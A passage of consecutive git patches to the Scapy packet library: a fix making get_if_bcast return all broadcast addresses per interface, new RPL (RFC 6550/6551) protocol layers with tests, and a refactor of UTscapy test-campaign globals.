17 00:00:00 2001 From: Michael Thomson Date: Fri, 29 May 2020 11:49:27 +0100 Subject: [PATCH 0181/1632] conf.route.get_if_bcast(iface) should return all valid broadcast addresses Intended to resolve #2635 All valid broadcast addresses for the given interface will be returned except: Default route (0.0.0.0/0) Host-specific routes (x.x.x.x/32) --- scapy/layers/l2.py | 2 +- scapy/route.py | 13 +++++++++---- test/regression.uts | 14 ++++++++++++++ 3 files changed, 24 insertions(+), 5 deletions(-) diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 3738060878d..358a15e0b7d 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -79,7 +79,7 @@ def getmacbyip(ip, chainCC=0): if (tmp[0] & 0xf0) == 0xe0: # mcast @ return "01:00:5e:%.2x:%.2x:%.2x" % (tmp[1] & 0x7f, tmp[2], tmp[3]) iff, _, gw = conf.route.route(ip) - if ((iff == conf.loopback_name) or (ip == conf.route.get_if_bcast(iff))): # noqa: E501 + if (iff == conf.loopback_name) or (ip in conf.route.get_if_bcast(iff)): return "ff:ff:ff:ff:ff:ff" if gw != "0.0.0.0": ip = gw diff --git a/scapy/route.py b/scapy/route.py index a0e28122257..ce2343b7afb 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -178,17 +178,22 @@ def route(self, dst=None, verbose=conf.verb): return ret def get_if_bcast(self, iff): + bcast_list = [] for net, msk, gw, iface, addr, metric in self.routes: if net == 0: - continue + continue # Ignore default route "0.0.0.0" + elif msk == 0xffffffff: + continue # Ignore host-specific routes if scapy.consts.WINDOWS: if iff.guid != iface.guid: continue elif iff != iface: continue - bcast = atol(addr) | (~msk & 0xffffffff) # FIXME: check error in atol() # noqa: E501 - return ltoa(bcast) - warning("No broadcast address found for iface %s\n", iff) + bcast = net | (~msk & 0xffffffff) + bcast_list.append(ltoa(bcast)) + if not bcast_list: + warning("No broadcast address found for iface %s\n", iff) + return bcast_list conf.route = Route() diff --git a/test/regression.uts b/test/regression.uts index 5744d0e4235..b25236b474c 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -11373,6 +11373,20 @@ r4.get_if_bcast(get_dummy_interface()) == "1.2.3.255" r4.ifdel(get_dummy_interface()) len(r4.routes) == len_r4 +dummy_interface = get_dummy_interface() + +conf.route.routes = [ + (0, 0, '172.21.230.1', dummy_interface, '172.21.230.10', 1), # 0.0.0.0 / 0.0.0.0 == 255.255.255.255 + (2851995648, 4294901760, '0.0.0.0', dummy_interface, '172.21.230.10', 1), # 169.254.0.0 / 255.255.0.0 == 169.254.255.255 + (2887116288, 4294967040, '0.0.0.0', dummy_interface, '172.21.230.10', 1), # 172.21.230.0 / 255.255.255.0 == 172.21.230.255 + (2887116289, 4294967295, '0.0.0.0', dummy_interface, '172.21.230.10', 1), # 172.21.230.1 / 255.255.255.255 == 172.21.230.1 + (3758096384, 4026531840, '0.0.0.0', dummy_interface, '172.21.230.10', 1), # 224.0.0.0 / 240.0.0.0 == 239.255.255.255 + (3758096635, 4294967295, '0.0.0.0', dummy_interface, '172.21.230.10', 1), # 224.0.0.251 / 255.255.255.255 == 224.0.0.251 + (4294967295, 4294967295, '0.0.0.0', dummy_interface, '172.21.230.10', 1), # 255.255.255.255 / 255.255.255.255 == 255.255.255.255 + ] + +assert sorted(conf.route.get_if_bcast(dummy_interface)) == sorted(['169.254.255.255', '172.21.230.255', '239.255.255.255']) +conf.route.resync() ############ ############ From cf043d57e2594c900d0b6b093fc2012272f8579d Mon Sep 17 00:00:00 2001 From: Rahul Jadhav Date: Sat, 30 May 2020 19:33:17 +0800 Subject: [PATCH 0182/1632] RPL (RFC 6550/6551) support --- scapy/contrib/rpl.py | 294 +++++++++++++++++++++++++++++++++++ scapy/contrib/rpl_metrics.py | 243 +++++++++++++++++++++++++++++ scapy/layers/inet6.py | 44 +++++- test/contrib/rpl.uts | 57 +++++++ 4 files changed, 637 insertions(+), 1 deletion(-) create mode 100644 scapy/contrib/rpl.py create mode 100644 scapy/contrib/rpl_metrics.py create mode 100644 test/contrib/rpl.uts diff --git a/scapy/contrib/rpl.py b/scapy/contrib/rpl.py new file mode 100644 index 00000000000..9be7ee15fbf --- /dev/null +++ b/scapy/contrib/rpl.py @@ -0,0 +1,294 @@ +# This file is part of Scapy. +# See http://www.secdev.org/projects/scapy for more information. +# +# Scapy is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 2 of the License, or +# (at your option) any later version. +# +# Scapy is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with Scapy. If not, see . +# +# Copyright (C) 2020 Rahul Jadhav + +# RFC 6550 +# scapy.contrib.description = Routing Protocol for LLNs (RPL) +# scapy.contrib.status = loads + +from scapy.packet import Packet +from scapy.fields import ByteEnumField, ByteField, IP6Field, ShortField, \ + XShortField, BitField, BitEnumField, FieldLenField, StrLenField, IntField +from scapy.layers.inet6 import icmp6rplcodes, RPL, icmp6ndraprefs, \ + _IP6PrefixField + + +# https://www.iana.org/assignments/rpl/rpl.xhtml#mop +rplmop = {0: "No Downward routes", + 1: "Non-Storing", + 2: "Storing with no multicast support", + 3: "Storing with multicast support", + 4: "P2P Route Discovery"} + + +# https://www.iana.org/assignments/rpl/rpl.xhtml#control-message-options +rploptsstr = {0: "Pad1", + 1: "PadN", + 2: "DAG Metric Container", + 3: "Routing Information", + 4: "DODAG Configuration", + 5: "RPL Target", + 6: "Transit Information", + 7: "Solicited Information", + 8: "Prefix Information Option", + 9: "Target Descriptor", + 10: "P2P Route Discovery"} + + +rplopts = { +} + + +class RPLGuessOption: + name = "Dummy RPL Option class that implements guess_payload_class()" + + def guess_payload_class(self, p): + if len(p) > 0: + return rplopts.get(ord(p[0])) + + +class OptRIO(Packet): + name = "Routing Information" + fields_desc = [ByteEnumField("otype", 3, rploptsstr), + FieldLenField("len", None, length_of="prefix", fmt="B", + adjust=lambda pkt, x: x + 6), + ByteField("plen", None), + BitField("res1", 0, 3), + BitEnumField("prf", 0, 2, icmp6ndraprefs), + BitField("res2", 0, 3), + IntField("rtlifetime", 0xffffffff), + _IP6PrefixField("prefix", None)] + + +class OptDODAGConfig(Packet): + name = "DODAG Configuration" + fields_desc = [ByteEnumField("otype", 4, rploptsstr), + ByteField("len", 14), + BitField("flags", 0, 4), + BitField("A", 0, 1), + BitField("PCS", 0, 3), + ByteField("DIOIntDoubl", 20), + ByteField("DIOIntMin", 3), + ByteField("DIORedun", 10), + ShortField("MaxRankIncrease", 0), + ShortField("MinRankIncrease", 256), + ShortField("OCP", 1), + ByteField("reserved", 0), + ByteField("DefLifetime", 0xff), + ShortField("LifetimeUnit", 0xffff)] + + +class OptTgt(Packet): + name = "RPL Target" + fields_desc = [ByteEnumField("otype", 5, rploptsstr), + FieldLenField("len", None, length_of="prefix", fmt="B", + adjust=lambda pkt, x: x + 2), + ByteField("flags", 0), + ByteField("plen", None), + _IP6PrefixField("prefix", None)] + + +class OptTIO(Packet): + name = "Transit Information" + fields_desc = [ByteEnumField("otype", 6, rploptsstr), + FieldLenField("len", None, length_of="parentaddr", fmt="B", + adjust=lambda pkt, x: x + 4), + BitField("E", 0, 1), + BitField("flags", 0, 7), + ByteField("pathcontrol", 0), + ByteField("pathseq", 0), + ByteField("pathlifetime", 0xff), + _IP6PrefixField("parentaddr", None)] + + +class OptSolInfo(Packet): + name = "Solicited Information" + fields_desc = [ByteEnumField("otype", 7, rploptsstr), + ByteField("len", 19), + ByteField("RPLInstanceID", 0), + BitField("V", 0, 1), + BitField("I", 0, 1), + BitField("D", 0, 1), + BitField("flags", 0, 5), + IP6Field("dodagid", "::1"), + ByteField("ver", 0)] + + +class OptPIO(Packet): + name = "Prefix Information" + fields_desc = [ByteEnumField("otype", 8, rploptsstr), + ByteField("len", 30), + ByteField("plen", 64), + BitField("L", 0, 1), + BitField("A", 0, 1), + BitField("R", 0, 1), + BitField("reserved1", 0, 5), + IntField("validlifetime", 0xffffffff), + IntField("preflifetime", 0xffffffff), + IntField("reserved2", 0), + IP6Field("prefix", "::1")] + + +class OptTgtDesc(Packet): + name = "RPL Target Descriptor" + fields_desc = [ByteEnumField("otype", 9, rploptsstr), + ByteField("len", 4), + IntField("descriptor", 0)] + + +class Pad1(Packet): + name = "Pad1" + fields_desc = [ByteEnumField("otype", 0x00, rploptsstr)] + + def alignment_delta(self, curpos): # No alignment requirement + return 0 + + def extract_padding(self, p): + return b"", p + + +class PadN(Packet): + name = "PadN" + fields_desc = [ByteEnumField("otype", 0x01, rploptsstr), + FieldLenField("optlen", None, length_of="optdata", fmt="B"), + StrLenField("optdata", "", + length_from=lambda pkt: pkt.optlen)] + + def alignment_delta(self, curpos): # No alignment requirement + return 0 + + def extract_padding(self, p): + return b"", p + + +# RPL Control Message Handling + + +class DIS(RPLGuessOption, Packet): + name = "DODAG Information Solicitation" + fields_desc = [XShortField("cksum", None), + # DIS Base Object + ByteField("flags", 0), + ByteField("reserved", 0)] + + +class DIO(RPLGuessOption, Packet): + name = "DODAG Information Object" + fields_desc = [XShortField("cksum", None), + # DIO Base Object + ByteField("RPLInstanceID", 50), + ByteField("ver", 0), + ShortField("rank", 1), + BitField("G", 1, 1), + BitField("unused1", 0, 1), + BitEnumField("mop", 1, 3, rplmop), + BitField("prf", 0, 3), + ByteField("dtsn", 240), + ByteField("flags", 0), + ByteField("reserved", 0), + IP6Field("dodagid", "::1")] + overload_fields = {RPL: {"code": 1}} + + +class _OptDODAGIDField(IP6Field): + def addfield(self, pkt, s, val): + if pkt.D == 1: + return s + self.i2m(pkt, val) + if val: + print("RPL DAO 'D' flag is not set but dodagid is given.") + return s + + +class DAO(RPLGuessOption, Packet): + name = "Destination Advertisement Object" + fields_desc = [XShortField("cksum", None), + # Base Object + ByteField("RPLInstanceID", 50), + BitField("K", 0, 1), + BitField("D", 0, 1), + BitField("flags", 0, 6), + ByteField("reserved", 0), + ByteField("daoseq", 1), + _OptDODAGIDField("dodagid", None)] + overload_fields = {RPL: {"code": 2}} + + +class DAOACK(RPLGuessOption, Packet): + name = "Destination Advertisement Object Acknowledgement" + fields_desc = [XShortField("cksum", None), + # Base Object + ByteField("RPLInstanceID", 50), + BitField("D", 0, 1), + BitField("reserved", 0, 7), + ByteField("daoseq", 1), + ByteField("status", 0), + _OptDODAGIDField("dodagid", None)] + overload_fields = {RPL: {"code": 3}} + + +# https://datatracker.ietf.org/doc/draft-ietf-roll-efficient-npdao/ +class DCO(RPLGuessOption, Packet): + name = "Destination Cleanup Object" + fields_desc = [XShortField("cksum", None), + # Base Object + ByteField("RPLInstanceID", 50), + BitField("K", 0, 1), + BitField("D", 0, 1), + BitField("flags", 0, 6), + ByteField("status", 0), + ByteField("dcoseq", 1), + _OptDODAGIDField("dodagid", None)] + overload_fields = {RPL: {"code": 7}} + + +# https://datatracker.ietf.org/doc/draft-ietf-roll-efficient-npdao/ +class DCOACK(RPLGuessOption, Packet): + name = "Destination Cleanup Object Acknowledgement" + fields_desc = [XShortField("cksum", None), + # Base Object + ByteField("RPLInstanceID", 50), + BitField("D", 0, 1), + BitField("flags", 0, 7), + ByteField("dcoseq", 1), + ByteField("status", 0), + _OptDODAGIDField("dodagid", None)] + overload_fields = {RPL: {"code": 8}} + + +# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes +icmp6rplcodes.update({0: DIS, + 1: DIO, + 2: DAO, + 3: DAOACK, + # 4: "P2P-DRO", + # 5: "P2P-DRO-ACK", + # 6: "Measurement", + 7: DCO, + 8: DCOACK}) + + +# https://www.iana.org/assignments/rpl/rpl.xhtml#control-message-options +rplopts.update({0: Pad1, + 1: PadN, + # 2: OptDAGMC # Handled in rpl_metrics.py + 3: OptRIO, # Routing Information + 4: OptDODAGConfig, # DODAG Configuration + 5: OptTgt, # RPL Target + 6: OptTIO, # Transit Information + 7: OptSolInfo, # Solicited Information + 8: OptPIO, # Prefix Information Option + 9: OptTgtDesc}) # Target Descriptor diff --git a/scapy/contrib/rpl_metrics.py b/scapy/contrib/rpl_metrics.py new file mode 100644 index 00000000000..287762e870c --- /dev/null +++ b/scapy/contrib/rpl_metrics.py @@ -0,0 +1,243 @@ +# This file is part of Scapy. +# See http://www.secdev.org/projects/scapy for more information. +# +# Scapy is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 2 of the License, or +# (at your option) any later version. +# +# Scapy is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with Scapy. If not, see . +# +# Copyright (C) 2020 Rahul Jadhav + +# RFC 6551 +# scapy.contrib.description = Routing Metrics used for Path Calc in LLNs +# scapy.contrib.status = loads + +import struct +from scapy.compat import orb +from scapy.packet import Packet +from scapy.fields import ByteEnumField, ByteField, ShortField, BitField, \ + BitEnumField, FieldLenField, StrLenField, IntField +from scapy.layers.inet6 import _PhantomAutoPadField, _OptionsField +from scapy.contrib.rpl import rploptsstr, rplopts + + +class _DAGMetricContainer(Packet): + name = 'Dummy DAG Metric container' + + def post_build(self, p, pay): + p += pay + tmp_len = self.len + if self.len is None: + tmp_len = len(p) - 2 + p = p[:1] + struct.pack("B", tmp_len) + p[2:] + return p + + +_dagmcobjtypes = {1: "Node State and Attributes", + 2: "Node Energy", + 3: "Hop Count", + 4: "Link Throughput", + 5: "Link Latency", + 6: "Link Quality Level", + 7: "Link ETX", + 8: "Link Color"} + + +class DAGMCObjUnknown(Packet): + name = 'Unknown DAGMC Object Option' + fields_desc = [ByteEnumField("otype", 3, _dagmcobjtypes), + FieldLenField("olen", None, length_of="odata", fmt="B"), + StrLenField("odata", "", + length_from=lambda pkt: pkt.olen)] + + @classmethod + def dispatch_hook(cls, _pkt=None, *_, **kargs): + if _pkt: + o = orb(_pkt[0]) # Option type + if o in dagmcobjcls: + return dagmcobjcls[o] + return cls + + +aggroutmetric = {0: "additive", + 1: "maximum", + 2: "minimum", + 3: "multiplicative"} # RFC 6551 + + +class DAGMCObj(Packet): + name = 'Dummy DAG MC Object' + + def post_build(self, p, pay): + p += pay + tmp_len = self.len + if self.len is None: + tmp_len = len(p) - 4 + p = p[:3] + struct.pack("B", tmp_len) + p[4:] + return p + + +class NSA(DAGMCObj): + name = "Node State and Attributes" + fields_desc = [ByteEnumField("otype", 1, _dagmcobjtypes), + BitField("resflags", 0, 5), + BitField("P", 0, 1), + BitField("C", 0, 1), + BitField("O", 0, 1), + BitField("R", 0, 1), + BitEnumField("A", 0, 3, aggroutmetric), + BitField("prec", 0, 4), + ByteField("len", None), + # NSA Object Body Format + ByteField("res", 0), + BitField("flags", 0, 6), + BitField("A", 0, 1), + BitField("O", 0, 1)] + + +class NodeEnergy(DAGMCObj): + name = "Node Energy" + fields_desc = [ByteEnumField("otype", 2, _dagmcobjtypes), + BitField("resflags", 0, 5), + BitField("P", 0, 1), + BitField("C", 0, 1), + BitField("O", 0, 1), + BitField("R", 0, 1), + BitEnumField("A", 0, 3, aggroutmetric), + BitField("prec", 0, 4), + ByteField("len", None), + # NE Sub-Object Format + BitField("flags", 0, 4), + BitField("I", 0, 1), + BitField("T", 0, 2), + BitField("E", 0, 1), + ByteField("E_E", 0)] + + +class HopCount(DAGMCObj): + name = "Hop Count" + fields_desc = [ByteEnumField("otype", 3, _dagmcobjtypes), + BitField("resflags", 0, 5), + BitField("P", 0, 1), + BitField("C", 0, 1), + BitField("O", 0, 1), + BitField("R", 0, 1), + BitEnumField("A", 0, 3, aggroutmetric), + BitField("prec", 0, 4), + ByteField("len", None), + # Sub-Object Format + BitField("res", 0, 4), + BitField("flags", 0, 4), + ByteField("HopCount", 1)] + + +class LinkThroughput(DAGMCObj): + name = "Link Throughput" + fields_desc = [ByteEnumField("otype", 4, _dagmcobjtypes), + BitField("resflags", 0, 5), + BitField("P", 0, 1), + BitField("C", 0, 1), + BitField("O", 0, 1), + BitField("R", 0, 1), + BitEnumField("A", 0, 3, aggroutmetric), + BitField("prec", 0, 4), + ByteField("len", None), + # Sub-Object Format + IntField("Throughput", 1)] + + +class LinkLatency(DAGMCObj): + name = "Link Latency" + fields_desc = [ByteEnumField("otype", 5, _dagmcobjtypes), + BitField("resflags", 0, 5), + BitField("P", 0, 1), + BitField("C", 0, 1), + BitField("O", 0, 1), + BitField("R", 0, 1), + BitEnumField("A", 0, 3, aggroutmetric), + BitField("prec", 0, 4), + ByteField("len", None), + # NE Sub-Object Format + IntField("Latency", 1)] + + +class LinkQualityLevel(DAGMCObj): + name = "Link Quality Level" + fields_desc = [ByteEnumField("otype", 6, _dagmcobjtypes), + BitField("resflags", 0, 5), + BitField("P", 0, 1), + BitField("C", 0, 1), + BitField("O", 0, 1), + BitField("R", 0, 1), + BitEnumField("A", 0, 3, aggroutmetric), + BitField("prec", 0, 4), + ByteField("len", None), + # Sub-Object Format + ByteField("res", 0), + BitField("val", 0, 3), + BitField("counter", 0, 5)] + + +class LinkETX(DAGMCObj): + name = "Link ETX" + fields_desc = [ByteEnumField("otype", 7, _dagmcobjtypes), + BitField("resflags", 0, 5), + BitField("P", 0, 1), + BitField("C", 0, 1), + BitField("O", 0, 1), + BitField("R", 0, 1), + BitEnumField("A", 0, 3, aggroutmetric), + BitField("prec", 0, 4), + ByteField("len", None), + # Sub-Object Format + ShortField("ETX", 1)] + + +# Note: Wireshark shows warning decoding LinkColor. +# This seems to be wireshark issue! +class LinkColor(DAGMCObj): + name = "Link Color" + fields_desc = [ByteEnumField("otype", 8, _dagmcobjtypes), + BitField("resflags", 0, 5), + BitField("P", 0, 1), + BitField("C", 0, 1), + BitField("O", 0, 1), + BitField("R", 0, 1), + BitEnumField("A", 0, 3, aggroutmetric), + BitField("prec", 0, 4), + ByteField("len", None), + # Sub-Object Format + ByteField("res", 0), + BitField("color", 1, 10), + BitField("counter", 1, 6)] + + +dagmcobjcls = {1: NSA, + 2: NodeEnergy, + 3: HopCount, + 4: LinkThroughput, + 5: LinkLatency, + 6: LinkQualityLevel, + 7: LinkETX, + 8: LinkColor} + + +class OptDAGMC(_DAGMetricContainer): + name = "DAG Metric Container" + fields_desc = [ByteEnumField("otype", 2, rploptsstr), + ByteField("len", None), + _PhantomAutoPadField("autopad", 0), + _OptionsField("options", [], DAGMCObjUnknown, 8, + length_from=lambda pkt: 8 * pkt.len)] + + +# https://www.iana.org/assignments/rpl/rpl.xhtml#control-message-options +rplopts.update({2: OptDAGMC}) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 29af3707721..2de8406d1c5 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -1202,6 +1202,8 @@ def fragment6(pkt, fragSize): 151: "ICMPv6MRD_Advertisement", 152: "ICMPv6MRD_Solicitation", 153: "ICMPv6MRD_Termination", + # 154: Do Me - FMIPv6 Messages - RFC 5568 + 155: "RPL", # RFC 6550 } icmp6typesminhdrlen = {1: 8, @@ -1229,7 +1231,8 @@ def fragment6(pkt, fragSize): 147: 8, 151: 8, 152: 4, - 153: 4 + 153: 4, + 155: 4 } icmp6types = {1: "Destination unreachable", @@ -1263,6 +1266,7 @@ def fragment6(pkt, fragSize): 151: "Multicast Router Advertisement", 152: "Multicast Router Solicitation", 153: "Multicast Router Termination", + 155: "RPL Control Message", 200: "Private Experimentation", 201: "Private Experimentation"} @@ -2600,6 +2604,43 @@ def _niquery_guesser(p): return cls +############################################################################# +############################################################################# +# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) # +############################################################################# +############################################################################# + +icmp6rplcodes = { +} # filled in contrib/rpl.py + + +class _RPLGuessPayload: + name = "Dummy RPL class that implements guess_payload_class()" + + def guess_payload_class(self, p): + if len(p) > 1: + return icmp6rplcodes.get(self.code, Raw) + + +# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes +rplcodes = {0: "DIS", + 1: "DIO", + 2: "DAO", + 3: "DAO-ACK", + 4: "P2P-DRO", + 5: "P2P-DRO-ACK", + 6: "Measurement", + 7: "DCO", + 8: "DCO-ACK"} + + +class RPL(_RPLGuessPayload, _ICMPv6): # RFC 6550 + name = 'RPL' + fields_desc = [ByteEnumField("type", 155, icmp6types), + ByteEnumField("code", 0, rplcodes)] + overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}} + + ############################################################################# ############################################################################# # Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) # @@ -3966,6 +4007,7 @@ def _load_dict(d): d[k] = _get_cls(v) +_load_dict(icmp6rplcodes) _load_dict(icmp6ndoptscls) _load_dict(icmp6typescls) _load_dict(ipv6nhcls) diff --git a/test/contrib/rpl.uts b/test/contrib/rpl.uts new file mode 100644 index 00000000000..d178b9c5f2b --- /dev/null +++ b/test/contrib/rpl.uts @@ -0,0 +1,57 @@ +% RPL layer test campaign + ++ Syntax check += Import the RPL layer +from scapy.contrib.rpl import * +from scapy.contrib.rpl_metrics import * + ++ Test RPL Control Messages += RPL Base Objects construction +assert(raw(RPL()/DIS()) == b'\x9b\x00\x00\x00\x00\x00') +assert(raw(RPL()/DIO()) == b'\x9b\x01\x00\x00\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +assert(raw(RPL()/DAO()) == b'\x9b\x02\x00\x00\x32\x00\x00\x01') +assert(raw(RPL()/DAOACK()) == b'\x9b\x03\x00\x00\x32\x00\x01\x00') +assert(raw(RPL()/DCO()) == b'\x9b\x07\x00\x00\x32\x00\x00\x01') +assert(raw(RPL()/DCOACK()) == b'\x9b\x08\x00\x00\x32\x00\x01\x00') + += RPL Base Objects dissection +# Test DIS dissection +p = RPL(b'\x9b\x00\x00\x00\x00\x00') +assert(p.code == 0) + +# Test DIO dissection +p = RPL(b'\x9b\x01\x00\x00\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +assert(p.code == 1) +assert(p.RPLInstanceID == 50) +assert(p.ver == 0) +assert(p.rank == 1) +assert(p.G == 1) +assert(p.mop == 1) +assert(p.dtsn == 240) +assert(p.dodagid == "::1") + +# Test DAO dissection +p = RPL(b'\x9b\x02\x00\x00\x32\x00\x00\x01') +assert(p.code == 2) + ++ Test RPL Control Message Options += RPL Control Options construction +# DIS +assert(raw(RPL()/DIS()/Pad1()) == b'\x9b\x00\x00\x00\x00\x00\x00') + +# DIS with solicited info option +assert(raw(RPL()/DIS()/OptSolInfo()) == \ + b'\x9b\x00\x00\x00\x00\x00\x07\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00') + +# DIO with DAG MC option with link ETX metric +assert(raw(RPL()/DIO()/OptDAGMC()/LinkETX())) == \ + b'\x9b\x01\x00\x00\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x07\x00\x00\x02\x00\x01' + +# Normal DAO message with single target, since transit +assert(raw(IPv6(src="fe80::1", dst="fe80::2")/\ + RPL()/DAO()/\ + OptTgt(plen=128,prefix="fd00::1")/\ + OptTIO())) == \ + b'\x60\x00\x00\x00\x00\x22\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x9b\x02\x2c\x04\x32\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x06\x04\x00\x00\x00\xff' + + From cf2df4fe341a52935295c2527cea1e93046dba14 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 25 Mar 2020 20:27:22 +0100 Subject: [PATCH 0183/1632] Default globals in Scapy session for every campaign This changes will give the same globals to every campaign. The context is set back to default before a new campaign is started And add globals_dict parameter to load commands of all unit tests Revert changes to non automotive related uts files revert load_contrib and load_layers --- scapy/tools/UTscapy.py | 29 +++++++++++---------- test/can.uts | 2 +- test/contrib/automotive/bmw/enet.uts | 3 +-- test/contrib/automotive/ccp.uts | 9 +++---- test/contrib/automotive/ecu.uts | 13 +++++----- test/contrib/automotive/ecu_am.uts | 18 +++++++------ test/contrib/automotive/gm/gmlan.uts | 9 +++---- test/contrib/automotive/gm/gmlanutils.uts | 20 +++++++-------- test/contrib/automotive/obd/obd.uts | 4 +-- test/contrib/automotive/obd/scanner.uts | 22 ++++++++-------- test/contrib/automotive/someip.uts | 2 +- test/contrib/automotive/uds.uts | 6 ++--- test/contrib/automotive/uds_utils.uts | 17 +++++++------ test/contrib/cansocket.uts | 6 +---- test/contrib/cansocket_native.uts | 31 +++-------------------- test/contrib/cansocket_python_can.uts | 7 +++-- test/contrib/isotp.uts | 4 +-- test/contrib/isotpscan.uts | 14 +++++----- test/tools/isotpscanner.uts | 5 ++-- test/tools/obdscanner.uts | 17 +++++++------ test/windows.uts | 6 +++++ 21 files changed, 109 insertions(+), 135 deletions(-) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index c2ceb316d2a..54aa4c1e597 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -30,8 +30,8 @@ from scapy.config import conf from scapy.compat import base64_bytes, bytes_hex, plain_str -# Util class # +# Util class # class Bunch: __init__ = lambda self, **kw: setattr(self, '__dict__', kw) @@ -522,14 +522,14 @@ def import_UTscapy_tools(ses): ses["conf"].route6.routes = conf.route6.routes -def run_campaign(test_campaign, get_interactive_session, drop_to_interpreter=False, verb=3, ignore_globals=None): # noqa: E501 +def run_campaign(test_campaign, get_interactive_session, drop_to_interpreter=False, verb=3, ignore_globals=None, scapy_ses=None): # noqa: E501 passed = failed = 0 - scapy_ses = importlib.import_module(".all", "scapy").__dict__ - import_UTscapy_tools(scapy_ses) if test_campaign.preexec: - test_campaign.preexec_output = get_interactive_session(test_campaign.preexec.strip(), ignore_globals=ignore_globals, my_globals=scapy_ses)[0] - # Drop + test_campaign.preexec_output = get_interactive_session( + test_campaign.preexec.strip(), ignore_globals=ignore_globals, + my_globals=scapy_ses)[0] + # Drop def drop(scapy_ses): code.interact(banner="Test '%s' failed. " "exit() to stop, Ctrl-D to leave " @@ -786,7 +786,7 @@ def usage(): # MAIN # def execute_campaign(TESTFILE, OUTPUTFILE, PREEXEC, NUM, KW_OK, KW_KO, DUMP, DOCS, - FORMAT, VERB, ONLYFAILED, CRC, INTERPRETER, autorun_func, pos_begin=0, ignore_globals=None): # noqa: E501 + FORMAT, VERB, ONLYFAILED, CRC, INTERPRETER, autorun_func, pos_begin=0, ignore_globals=None, scapy_ses=None): # noqa: E501 # Parse test file test_campaign = parse_campaign_file(TESTFILE) @@ -820,7 +820,7 @@ def execute_campaign(TESTFILE, OUTPUTFILE, PREEXEC, NUM, KW_OK, KW_KO, DUMP, DOC # Run tests test_campaign.output_file = OUTPUTFILE - result = run_campaign(test_campaign, autorun_func[FORMAT], drop_to_interpreter=INTERPRETER, verb=VERB, ignore_globals=None) # noqa: E501 + result = run_campaign(test_campaign, autorun_func[FORMAT], drop_to_interpreter=INTERPRETER, verb=VERB, ignore_globals=None, scapy_ses=scapy_ses) # noqa: E501 # Shrink passed if ONLYFAILED: @@ -1055,17 +1055,20 @@ def main(): pos_begin = 0 runned_campaigns = [] + + scapy_ses = importlib.import_module(".all", "scapy").__dict__ + import_UTscapy_tools(scapy_ses) + # Execute all files for TESTFILE in TESTFILES: if VERB > 2: print("### Loading:", TESTFILE, file=sys.stderr) PREEXEC = PREEXEC_DICT[TESTFILE] if TESTFILE in PREEXEC_DICT else GLOB_PREEXEC with open(TESTFILE) as testfile: - output, result, campaign = execute_campaign(testfile, OUTPUTFILE, - PREEXEC, NUM, KW_OK, KW_KO, - DUMP, DOCS, FORMAT, VERB, ONLYFAILED, - CRC, INTERPRETER, autorun_func, pos_begin, - ignore_globals) + output, result, campaign = execute_campaign( + testfile, OUTPUTFILE, PREEXEC, NUM, KW_OK, KW_KO, DUMP, DOCS, + FORMAT, VERB, ONLYFAILED, CRC, INTERPRETER, autorun_func, + pos_begin, ignore_globals, copy.copy(scapy_ses)) runned_campaigns.append(campaign) pos_begin = campaign.end_pos if UNIQUE: diff --git a/test/can.uts b/test/can.uts index f4c3229a80e..8fb734ade3e 100644 --- a/test/can.uts +++ b/test/can.uts @@ -15,7 +15,7 @@ import random random.seed() -load_layer("can") +load_layer("can", globals_dict=globals()) = Build a packet diff --git a/test/contrib/automotive/bmw/enet.uts b/test/contrib/automotive/bmw/enet.uts index 13b69b881ce..da8b05a7fe6 100644 --- a/test/contrib/automotive/bmw/enet.uts +++ b/test/contrib/automotive/bmw/enet.uts @@ -1,8 +1,7 @@ + ENET Contrib tests = Load Contrib Layer - -load_contrib("automotive.bmw.enet") +load_contrib("automotive.bmw.enet", globals_dict=globals()) = Basic Test 1 diff --git a/test/contrib/automotive/ccp.uts b/test/contrib/automotive/ccp.uts index b160ba1948c..2fa8e29234e 100644 --- a/test/contrib/automotive/ccp.uts +++ b/test/contrib/automotive/ccp.uts @@ -4,9 +4,9 @@ ~ conf = Imports -load_layer("can") +load_layer("can", globals_dict=globals()) conf.contribs['CAN']['swap-bytes'] = False -import threading, six +import scapy.modules.six as six from subprocess import call from scapy.consts import LINUX @@ -47,7 +47,6 @@ print("CAN should work now") from scapy.contrib.cansocket_python_can import * -import can as python_can new_can_socket = 